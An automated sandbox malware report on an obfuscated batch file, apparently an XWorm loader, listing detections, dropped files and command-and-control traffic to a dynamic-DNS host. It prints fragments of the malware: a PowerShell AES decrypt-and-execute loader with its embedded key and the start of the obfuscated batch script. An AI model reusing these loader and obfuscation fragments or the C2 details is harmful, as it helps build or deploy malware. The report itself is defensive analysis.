      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446781 Sample: info.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 76 25 newremisco2905.duckdns.org 2->25 29 Snort IDS alert for network traffic 2->29 31 Yara detected Powershell decode and execute 2->31 33 Sigma detected: Suspicious PowerShell Parameter Substring 2->33 8 cmd.exe 1 2->8         started        signatures3 35 Uses dynamic DNS services 25->35 process4 signatures5 37 Suspicious powershell command line found 8->37 39 Obfuscated command line found 8->39 41 Bypasses PowerShell execution policy 8->41 11 powershell.exe 28 8->11         started        15 conhost.exe 8->15         started        17 cmd.exe 1 8->17         started        19 cmd.exe 1 8->19         started        process6 dnsIp7 27 newremisco2905.duckdns.org 163.172.59.233, 2905, 49705 OnlineSASFR United Kingdom 11->27 23 \Device\ConDrv, ASCII 11->23 dropped 21 wermgr.exe 14 11->21         started        file8 process9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      info.cmd3%ReversingLabs

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://upx.sf.net0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      newremisco2905.duckdns.org
      		163.172.59.233
      		truetrue
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://upx.sf.netAmcache.hve.5.drfalse
        • URL Reputation: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        163.172.59.233
        		newremisco2905.duckdns.orgUnited Kingdom
        		12876OnlineSASFRtrue

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446781
        Start date and time:2024-05-23 21:06:20 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 47s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:info.cmd
        Detection:MAL
        Classification:mal76.troj.evad.winCMD@9/9@1/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .cmd
        • Override analysis time to 240s for powershell

        Warnings

        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 104.208.16.94
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: info.cmd

        Simulations

        Behavior and APIs

        TimeTypeDescription
        15:07:25API Interceptor7444886x Sleep call for process: powershell.exe modified
        15:10:34API Interceptor1x Sleep call for process: wermgr.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        163.172.59.233bSFJ.exeGet hashmaliciousXWormBrowse
          receipt.vbsGet hashmaliciousXWormBrowse
            Docs.vbsGet hashmaliciousXWormBrowse
              damaged_items.wsfGet hashmaliciousXWormBrowse
                file.ps1Get hashmaliciousXWormBrowse
                  damaged_item.vbsGet hashmaliciousXWormBrowse
                    file2.ps1Get hashmaliciousXWormBrowse
                      item_pictures.vbsGet hashmaliciousXWormBrowse
                        1707765188292b82159fb496a7b8faef3eed8405341a5e1f23597583777c553dcec1a90478611.dat-decoded.exeGet hashmaliciousXWormBrowse
                          screen_shots.vbsGet hashmaliciousXWormBrowse

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            OnlineSASFRhttps://suite-trezor-io.owconsulting.fr/Get hashmaliciousUnknownBrowse
                            • 163.172.255.246
                            https://link.tmr04.com/c?q=lbDkjvuqh3Lwv34SJZrn7LGF2gBHaHR0cHM6Ly9zdGFnZWRlc2Vjb25kZS4xamV1bmUxc29sdXRpb24uZ291di5mci91dGlsaXNhdGV1cnMvaW5zY3JpcHRpb26sYlV-PpkyI6Ebn0wKrGZMssHksLM9fAVfHK5saW5rLnRtcjA0LmNvbQGet hashmaliciousUnknownBrowse
                            • 51.159.204.229
                            https://pdf-ca0478494.istmein.de/svx/Get hashmaliciousUnknownBrowse
                            • 51.159.84.191
                            jXBjxhHQgR.exeGet hashmaliciousCMSBruteBrowse
                            • 195.154.168.209
                            fonts-utilGet hashmaliciousUnknownBrowse
                            • 163.172.139.104
                            https://olioingravidanza.it/par/Get hashmaliciousUnknownBrowse
                            • 51.159.84.191
                            aowNKqhrAX.elfGet hashmaliciousMiraiBrowse
                            • 163.172.191.132
                            2mim34IfQZ.exeGet hashmaliciousAsyncRAT, PureLog Stealer, Xmrig, zgRATBrowse
                            • 51.15.65.182
                            jew.x86.elfGet hashmaliciousUnknownBrowse
                            • 212.129.5.11
                            http://eurovisionsongcontest.nlGet hashmaliciousUnknownBrowse
                            • 51.159.84.191

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a877394161d3cf447332d615808566972940da62_00000000_b2b52842-c3cd-48c2-a202-46063c34dbc7\Report.wer

                            Download File
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.5193645502518501
                            Encrypted:false
                            SSDEEP:96:Z8FnjwIrxYid/RH3Uje0eu/RoJV1QXIGZAX/d5FMT2SlPkpXmTAjf/VXT5NHBjTB:OhNmG/R30h/AzuiFTZ24lO8
                            MD5:5BAACB43EFA7EF614BAC9563FA3063A1
                            SHA1:77F6A39A84C483EBECCD885AEE866E5F363B5E6B
                            SHA-256:6E03558DAC6314092824222B1EDB895749A15ED4C01D22466E0163EA7A7CE289
                            SHA-512:77B688075FFE05C74E412CFB27132FEFBAC2990D7DE1A778BE6E3C33F0550A5D7E79FB235B0155743716A5D8C7D4CA88D8BFF16FF58BB8B14A4C8553F82008D6
                            Malicious:false
                            Reputation:low
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.4.3.0.2.3.5.5.9.6.5.4.7.6.1.5.5.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.9.6.5.0.2.9.7.3.5.1.7.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.2.b.5.2.8.4.2.-.c.3.c.d.-.4.8.c.2.-.a.2.0.2.-.4.6.0.6.3.c.3.4.d.b.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.a.0.-.0.0.0.1.-.0.0.1.4.-.9.4.0.5.-.7.c.6.f.4.4.a.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER414E.tmp.WERInternalMetadata.xml

                            Download File
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):7200
                            Entropy (8bit):3.6836503723230667
                            Encrypted:false
                            SSDEEP:96:RSIU6o7wVetbdvQZdkzU6YO+LvjgmfHNGfB7Te5aMfTm:R6l7wVeJdvHzU6YO0rgmftW4pfTm
                            MD5:F76415C8A6548340A2C58211133EB3E9
                            SHA1:1F34FED18AEB2DA685F7197D84FBD7392EF345C6
                            SHA-256:D6D1958BC63F22BE2115F2725C0DC9E5DEF89E07E40D8AD7541B1EC8264A820B
                            SHA-512:66981261704EFBA432FFF199FB3B20AAE9E88F61CA91396C808919807D673AEC14B3B7C0C4F8DA5DA2BFD202CAF17198E8B5620408E56319CF6DA7EFCADB36A1
                            Malicious:false
                            Reputation:low
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.3.6.<./.P.i.

                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER41AD.tmp.xml

                            Download File
                            Process:C:\Windows\System32\wermgr.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4691
                            Entropy (8bit):4.506933787754004
                            Encrypted:false
                            SSDEEP:96:uIjf5I7Qp7VoJFKlEFBfFTWTXFBfFerrufqd:uIlYQp7G4TIufI
                            MD5:C1EFADC40EE702DFF401A8D187729C3F
                            SHA1:CBE52FF9FE3EF3BF61CD159A23DA9F5D5CF748C2
                            SHA-256:66437F36FD405F4FE85EEC4696614E1807882051A8FD9FBDA22F5A9C6A478400
                            SHA-512:B885A2FE6DCB58F58227016C860537105A7BC1D7497E387BD02089875CA1A758956EAE71D8D2D91DC0DB9AE2B7BB35F3AFDE512D2284DAEB100B8F0B922ED424
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="336133" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Reputation:low
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):3056
                            Entropy (8bit):5.465515946139154
                            Encrypted:false
                            SSDEEP:48:CAzsSU4y4RQmFoUeCamfm9qr9t5/78NKRwS4GxJZKaVEouYAgwd64rHLjtv5/G+v:CAzlHyIFKL2O9qrh7KKRwSJ5Eo9Adrxj
                            MD5:2E5BCE07104547FE87397C8EAA3BA817
                            SHA1:A2F2D555B3C08681427546C57E311E802A4F8025
                            SHA-256:9DF2A6BDD89423BBC9661A09C46FC35E8626F525E7DA41B9D1286AB75835931E
                            SHA-512:FBB8063CD45BA3009CBF170E6CF6DADA809D0D9E6849FE0BA2C93AE9E0692BEF5BB2A8605C8B41E595ACE541D02F3618332FB408461D51D1519C9CAE0BDC0155
                            Malicious:false
                            Reputation:low
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0ve00zt2.aut.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yry5vgbv.urw.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Windows\appcompat\Programs\Amcache.hve

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.372852778539526
                            Encrypted:false
                            SSDEEP:6144:2FVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguN/iL:WV1qyWWI/glMM6kF7tq
                            MD5:A62F919E2E93C0A8C261829F2534F5C8
                            SHA1:F821794632F69885CE3A0E18B7D9828B37E26181
                            SHA-256:A6AFD4714D392CB9BDCEB35D98989210702A57C90078C28B4F146E8A0A78C50B
                            SHA-512:7C533FC29A853DD20A57C6C40E6C311E03925E13F8BD17C4ED9ADBDBCBD0EF39B29A3520925E2D1DC37D161A75EA0FC7F2119D4D4639B9CA51CF7B0C93FAE3CF
                            Malicious:false
                            Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....D...............................................................................................................................................................................................................................................................................................................................................D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            \Device\ConDrv

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with very long lines (1904), with CRLF line terminators
                            Category:dropped
                            Size (bytes):1906
                            Entropy (8bit):5.62643685088677
                            Encrypted:false
                            SSDEEP:48:IJRm8RUYRxSKBCAqjBqozDpOXkHOkvkT//XbhG2ZlZAmzMIuwfOLx1CH2c:QBN7PBUjBqoVEngeLAmOwGLxAWc
                            MD5:AA10B706E5AECFC58FE487E0831021F2
                            SHA1:94696B1080DB3691AFB2B0172772B972A316AC96
                            SHA-256:F9107FAD68067406EEABB8AB916F3E6907343D0DC918815007DF678FDA3E0CE0
                            SHA-512:62FC144C7941838D0E41110802F80265FBCAD14288358F323E7F4ECEFEECF6894916FFDFF35FE9122C3CCF5243ED5BAD6347766BC6FEB4AF5AEBD3EFF7E99773
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: \Device\ConDrv, Author: Joe Security
                            Preview:function decrypt_function($param_var){.$aes_var=[System.Security.Cryptography.Aes]::Create();.$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU=');.$aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw==');.$decryptor_var=$aes_var.CreateDecryptor();.$return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);.$decryptor_var.Dispose();.$aes_var.Dispose();.$return_var;}function decompress_function($param_var){.$liFcl=New-Object System.IO.MemoryStream(,$param_var);.$YKPPP=New-Object System.IO.MemoryStream;.$DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress);.$DrFOQ.CopyTo($YKPPP);.$DrFOQ.Dispose();.$liFcl.Dispose();.$YKPPP.Dispose();.$YKPPP.ToArray();}function execute_function($param_va

                            Static File Info

                            General

                            File type:ASCII text, with very long lines (58328), with CRLF line terminators
                            Entropy (8bit):6.09259465342361
                            TrID:
                              File name:info.cmd
                              File size:82'133 bytes
                              MD5:43f3ee9c714203eeccd5503d17a36105
                              SHA1:d554becc96c1296d948382fd2ea8c1a1ad0184c8
                              SHA256:c153c05ebbf7db866984c1b21da5bfebbaedcfa5fce0cecb09a50377e0503a53
                              SHA512:f54a1bc1772bd6c6651dc2df50fa2cfca70c7bd8b89307d66e3a290aa881c7cda5176ead1b00566f54d729e68cbd57832d02580664da9a361ee1db95b5ac296d
                              SSDEEP:1536:UlFEtm9P8DRSi0ga9pZ8nS0JdX48PiZ5LU/8ZeMhRY6NP/gLl+uC:UlgROg6N0x6ZxUEXRYA/8lE
                              TLSH:248302F5C0A2940421FC5ACD587EF766E36E9AD8A366E9CEC0B5738294BC007FC55B14
                              File Content Preview:cmd /c "set __=^&rem"..set "BXeG=Lo"..set "euUW=nvo"..set "NMnM=lect"..set "qOnZ=byp"..set "KEVf=prof"..set "mDUqDELLJqYpSjTUNsic=echo function decryp"..set "gOdcDLkvtzzfybzXcNdz=t_function($param_va"..set "JjmwNYUgVslswSZyzRNR=r){.$aes_var=[System"..set

                              File Icon

                              Icon Hash:9686878b929a9886

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              05/23/24-21:10:10.754109TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2290549705163.172.59.233192.168.2.8
                              05/23/24-21:10:10.754109TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes290549705163.172.59.233192.168.2.8
                              05/23/24-21:07:45.319600TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497052905192.168.2.8163.172.59.233
                              05/23/24-21:08:53.440750TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound497052905192.168.2.8163.172.59.233

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              May 23, 2024 21:07:31.724806070 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:07:31.743388891 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:07:31.743542910 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:07:31.854635000 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:07:31.859973907 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:07:40.795804977 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:07:40.847754002 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:07:45.319600105 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:07:45.324966908 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:07:58.785972118 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:07:58.793808937 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:10.754934072 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:10.801239967 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:12.253950119 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:12.258991003 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:25.723098040 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:25.730739117 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:39.178153038 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:39.183161020 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:40.489376068 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:40.494440079 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:40.757714033 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:40.801556110 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:40.848701954 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:40.858064890 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:42.802201033 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:42.807086945 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:45.098764896 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:45.103764057 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:47.833163977 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:47.891324997 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:48.813427925 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:48.819324970 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:48.837806940 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:48.842736006 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:50.762063026 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:50.767121077 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:51.334836006 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:51.339797020 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:51.960171938 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:51.969654083 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:52.140747070 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:52.146708012 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:52.347429037 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:52.352550030 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:52.402971983 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:52.408525944 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:52.612323999 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:52.617643118 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:52.654520035 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:52.659526110 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:52.870882988 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:52.895204067 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:52.951927900 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:53.176035881 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:53.440749884 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:53.446048021 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:53.744741917 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:53.749994993 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:54.005187988 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:54.012809038 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:54.080832958 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:54.085758924 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:54.140400887 CEST497052905192.168.2.8163.172.59.233
                              May 23, 2024 21:08:54.145570993 CEST290549705163.172.59.233192.168.2.8
                              May 23, 2024 21:08:54.260932922 CEST497052905192.168.2.8163.172.59.233
